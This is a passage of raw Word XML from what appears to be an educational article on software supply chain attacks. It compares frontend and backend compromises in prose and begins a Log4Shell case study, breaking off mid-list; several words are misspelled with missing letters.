                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>client-side asset frameworks (e.g., a</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">poisoned </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>npm</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve"> package </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>afectng</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve"> a</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>React/Vue frontend) to target end-</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>users.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="199DD0F2" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Exploitng</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve"> server-side parsing engines,</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>backend processing tools, data</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>serializers, or downstream API</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>integratons</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D66BA1" w:rsidRPr="0083079C" w14:paraId="424B0FD8" w14:textId="77777777" w:rsidTr="00B0643B">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="11A8A640" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Parameter</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Bindings &amp;</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Payloads</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0DFEA88A" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve">Payloads </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>ofen</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve"> target browser</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>interpretaton</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve"> layers via</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>HTML/JavaScript (e.g., stealing</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>cookies, capturing keystrokes via</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>form inputs).</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7D946DF3" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Payloads are wrapped inside structural</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">formats like JSON, XML, or </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>GraphQL</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>queries, aiming to abuse how the server</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>processes data.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D66BA1" w:rsidRPr="0083079C" w14:paraId="688372FF" w14:textId="77777777" w:rsidTr="00B064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ABA204" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Specifc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Supply Chain</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Mechanics</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="57735768" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>A compromised frontend</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>dependency executes inside the</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>customer's browser, allowing</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>atackers</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve"> to harvest user </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>credentals</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>session tokens, or credit card details</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>silently (</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Magecart</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve">-style </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>atacks</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>).</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7EED1675" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>A poisoned backend API library intercepts</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>incoming data objects, manipulates data</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>binding mechanisms (e.g., Mass</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>Assignment), or leverages system</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>privileges to query adjacent internal</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>microservices that lack individual</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>authentcaton</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve"> gates.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="15DFA171" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>3. Real-World Example: The Log4Shell Crisis (CVE-2021-44228)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F4128BE"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What Went Wrong</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41C4DFCF"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 xml:space="preserve">In late 2021, a catastrophic software supply chain vulnerability known as </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Log4Shell</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> was discovered in Apache Log4j, an omnipresent open-source logging library utilized by millions of enterprise Java applications globally. The flaw was an accidental coding error involving how the library handled string lookups.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38CAD96C"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If an application logged a specific string sequence containing a Java Naming and Directory Interface (JNDI) reference, the Log4j library would automatically attempt to connect to the external URL provided in the string, download the remote Java class file, and execute it natively on the server. Because logging user inputs (like usernames, User-Agents, or email addresses) is a standard operational practice, any untrusted string passed into the application could trigger the exploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5903DA2D"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The Exploit &amp; Fallout</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03D5D74E"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Because Log4j was a deeply embedded transitive dependency inside countless commercial software packages, cloud platforms, and enterprise applications, organizations frequently didn't even realize they were running the vulnerable code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DB16E7A"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The fallout was unprecedented:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AE81F6D" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="87"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>The Attack Surface:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Major technology giants—including Microsoft, Apple, Amazon Web Services, and Minecraft—discovered they were vulnerable due to their underlying supply chain dependencies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="160A8206" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="87"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>The Exploitation:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Nation-state actors and cybercriminal syndicates immediately launched automated scans across the internet, exploiting the flaw to deploy </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>ransomware, recruit servers into massive botnets, and establish persistent backdoors inside corporate networks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C2AE976" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="87"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>The Lesson:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
